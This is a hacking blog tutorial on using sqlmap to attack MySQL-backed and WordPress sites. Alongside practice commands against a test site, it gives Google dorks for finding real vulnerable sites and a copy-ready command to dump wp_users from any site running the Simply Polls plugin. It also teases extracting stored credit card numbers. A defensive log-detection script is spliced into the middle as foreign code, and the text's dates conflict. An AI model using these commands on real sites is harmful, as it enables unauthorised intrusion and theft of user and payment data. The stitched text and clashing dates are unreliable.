
Sqlmap 😈: Hacking MySQL & WordPress Sites😉 with SQL Injection 💉

Updated: Nov 30, 2022

CyberMorans 🤗

SQL Injection 💉 is one of the most prevalent and common attacks on websites. Nearly every website has a database behind it containing confidential and valuable information 🧐 that can often be compromised by a well-designed SQL injection attack 😈

There are many SQL injection tools, but the most popular is sqlmap. In this tutorial, we will use sqlmap to compromise a MySQL database behind a website 😋

Generally, MySQL is teamed up with PHP and an Apache web server (often referred to as LAMP) to build dynamic, database-driven web sites 😋. Content management and development packages such as Drupal, Joomla, WordPress, Ruby on Rails and others use MySQL as their default backend database. Millions of websites have MySQL backends, and very often they are "homegrown" websites built without much attention to security 😝

In this post, we look at extracting information about an online MySQL database before we actually extract data from it.


Sqlmap can be used against databases other than MySQL, such as Microsoft's SQL Server and Oracle, but here we will focus its capabilities on those ubiquitous web sites built with PHP, Apache and MySQL, such as WordPress, Joomla and Drupal 🧐


So, Morans, Let's ndu THIS!... 💪



Start sqlmap 🚀

First, fire up Kali and go to Applications > Database Assessment > sqlmap. When you click on sqlmap, you see the screen below 👇


🚀 Find a Vulnerable WebSite🧐

To get into the website and, ultimately, the database, we are looking for web sites whose URLs end in "php?id=xxx", where xxx is some number. If you are familiar with Google hacks/dorks, you can search Google by entering:

  • inurl:index.php?id=

  • inurl:gallery.php?id=

  • inurl:post.php?id=

  • inurl:article?id=

These 👆 dorks will bring up millions of web sites that meet this basic vulnerability criterion. If you are creative and ambitious, you can find numerous web sites that list vulnerable web sites. You might want to check those out 😉


For us here, we will be hacking a website designed for this purpose, www.webscantest.com. You can practice on this web site and refine your skills without worrying about breaking any laws and selling a plot to make bail money 🤣


Sqlmap is a powerful tool written in Python, with a great many options. We will just be scratching the surface of its capabilities in this proof of concept 🤭


🚀 Determine the DBMS Behind the WebSite🧐

Before we begin hacking a web site, we need to gather information.

Let's begin by finding out what DBMS is behind this web site.

On the terminal, type 👇

sqlmap -u "the entire URL of the vulnerable web page"

thus 👇

sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4"

PS: The entire URL is enclosed in double quotation marks (") 👇

sqlmap returns results like those below 👇. Notice the highlighted line: the web site's backend is MySQL 5.0 👇


🚀 Find the Database🧐

Now that we know the database management system (DBMS) is MySQL 5.0, we need to know what databases it contains. sqlmap can do that. We take the command used above and append --dbs, like so 👇

sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs

Running this command against www.webscantest.com, we get results like these 👇

Notice the two available databases, information_schema and webscantest. information_schema is included in every MySQL installation and describes all the objects in the MySQL instance, but it holds no data of interest to us. Although it can be useful to explore that database to find objects in all the databases in the instance, our attention here is on the other database, webscantest, which may hold some valuable information. Let's dig a little further 😋


🚀 Digging More Info from the Database🧐

So, we have the DBMS (MySQL 5.0) and the name of a database of interest (webscantest). The next step is to determine the tables and columns in that database. That way, we will have some idea of:

  1. what data is in the database,

  2. where it is and

  3. which type of data it contains (numeric or string).


All of this 👆 information is critical for extracting the data. To get it, we need to make some small edits to our sqlmap command. Everything we used above stays the same, but now we tell sqlmap we want to see the tables and columns of the webscantest database.

We append --columns -D followed by the name of the database, webscantest, like so 👇


sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs --columns -D webscantest

Sqlmap 👆 will target the webscantest database and attempt to enumerate its tables and columns. As you can see below, sqlmap was able to enumerate three tables:

  1. accounts,

  2. inventory, and

  3. orders, complete with column names and datatypes.

Not Bad eeh! 👇


See 👆 that the orders table above includes credit card numbers, expiration dates and CVVs 🤯 In the next part, I'll show you how to extract that information 💀
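From the defender's side, the fingerprinting and --dbs/--columns enumeration described above leave a recognisable trail in the web server's access log. The following example is added here (my code, not from the post or from sqlmap) and runs over constructed Apache combined-format lines: it decodes the probes sent in the id parameter (boolean, UNION against information_schema, time-based) and flags the source IP, matching on payloads rather than only the sqlmap user agent, because --random-agent replaces that header.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Nov/2022:10:00:01 +0000] "GET /datastore/search_get_by_id.php?id=4 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [30/Nov/2022:10:00:02 +0000] "GET /datastore/search_get_by_id.php?id=4%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.6.11#stable (https://sqlmap.org)"
203.0.113.5 - - [30/Nov/2022:10:00:03 +0000] "GET /datastore/search_get_by_id.php?id=4%20UNION%20ALL%20SELECT%20schema_name%2CNULL%20FROM%20information_schema.schemata-- HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
203.0.113.5 - - [30/Nov/2022:10:00:04 +0000] "GET /datastore/search_get_by_id.php?id=4%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.7 - - [30/Nov/2022:10:00:05 +0000] "GET /datastore/search_get_by_id.php?id=17 HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Macintosh)"
"""

# Apache "combined" LogFormat: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Payload shapes produced by DBMS fingerprinting and schema enumeration; matched on
# the URL-decoded query so encoding does not hide them.
PAYLOAD_PATTERNS = {
    "union_enum": re.compile(r"union\s+(all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"information_schema\.", re.I),
    "boolean_blind": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
    "time_blind": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
}

def classify_request(line):
    """Return {ip, path, tags} for a parsable line, or None if it is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m["path"])
    tags = [name for name, pat in PAYLOAD_PATTERNS.items() if pat.search(decoded)]
    # The default UA is a weak signal on its own: --random-agent removes it entirely.
    if "sqlmap" in m["ua"].lower():
        tags.append("sqlmap_ua")
    return {"ip": m["ip"], "path": decoded, "tags": tags}

def suspicious_sources(log_text):
    """Group flagged requests by source IP; an IP with several tags is probably sqlmap."""
    hits = {}
    for line in log_text.splitlines():
        rec = classify_request(line)
        if rec and rec["tags"]:
            hits.setdefault(rec["ip"], []).append(rec)
    return hits

if __name__ == "__main__":
    for ip, recs in suspicious_sources(SAMPLE_LOG).items():
        print(ip, len(recs), sorted({t for r in recs for t in r["tags"]}))
```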


🤖 Complex/Modern sqlmap Attack on WordPress Sites ☠

A more advanced use of this tool: in December 2016, a security researcher (Tad Group) found a vulnerability that enables an advanced SQL injection attack against WordPress websites that include the Simply Polls plug-in (https://wordpress.org/plugins/simply-polls/).


Since this attack was only recently released (2021) and millions of users have not yet patched, most of these sites are vulnerable 😹


The sqlmap command to exploit those WordPress sites with the Simply Polls plug-in is 👇

sqlmap -u "http://example.com/wp-admin/admin-ajax.php" --data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Replace "example.com" with the URL of the vulnerable website.

Sqlmap is a very versatile and useful tool for MySQL hacking, as well as for MS SQL Server and Oracle databases 🥶


In the next part, we extract this data from the database. Don't miss it... click here to proceed to part 2 😋



Conclusion 🤖

Subscribe to receive notifications of similar posts 😋, where we will be reverse engineering malware, looking at the technical side of vulnerabilities and how an attacker may use them as an attack vector, and covering other infosec topics... 😋


Morans,

Thank you for your time. Like and leave a comment/review and, as always, stay awesome! 😋👊 💪
